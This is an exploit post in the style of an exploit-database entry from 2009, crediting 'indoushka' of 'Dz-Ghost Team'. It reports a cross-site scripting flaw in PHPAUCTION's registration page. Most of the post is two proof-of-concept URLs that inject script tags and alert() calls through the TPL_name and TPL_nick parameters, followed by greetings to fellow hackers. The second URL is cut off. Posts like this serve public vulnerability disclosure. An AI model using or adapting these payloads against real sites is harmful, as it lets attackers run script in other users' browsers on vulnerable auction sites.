======================================================================================== | # Title : PHPAUCTION Cross Site Scripting Vulnerability | | # Author : indoushka | | # email : indoushka@hotmail.com | | # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) | | # EDB-ID : | | # CVE-ID : () | | # OSVDB-ID : () | | # DAte :16/12/2009 | | # Verified : | | # Web Site : www.iq-ty.com | | # Published: | | # Script : Copyright 2000-2009, PHPAUCTION.ORG | | # Tested on: windows SP2 Fran�ais V.(Pnx2 2.0) + Lunix Fran�ais v.(9.4 Ubuntu) | | # Bug : XSS | ====================== Exploit By indoushka ================================= | # Exploit : | | 1-http://localhost/phpauction/register.php?TPL_name=1>">alert(213771818860)%3B&TPL_nick=indoushka&TPL_password=indoushka@hotmail.com&TPL_repeat_password=indoushka@hotmail.com&TPL_email=indoushka@hotmail.com | 2- http://localhost/phpauction/register.php?TPL_name=indoushka&TPL_nick=1%3E%22%3E%3CScRiPt%20%0d%0a%3Ealert(213771818860)%3B%3C/ScRiPt%3E&TPL_password=indoushka@hotmail.com&TPL_repeat_password=indoushka@hotmail.com&TPL_email=indoushka@hotmail.com&TP | ================================ Dz-Ghost Team ======================================== Greetz : all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 | -------------------------------------------------------------------------------------------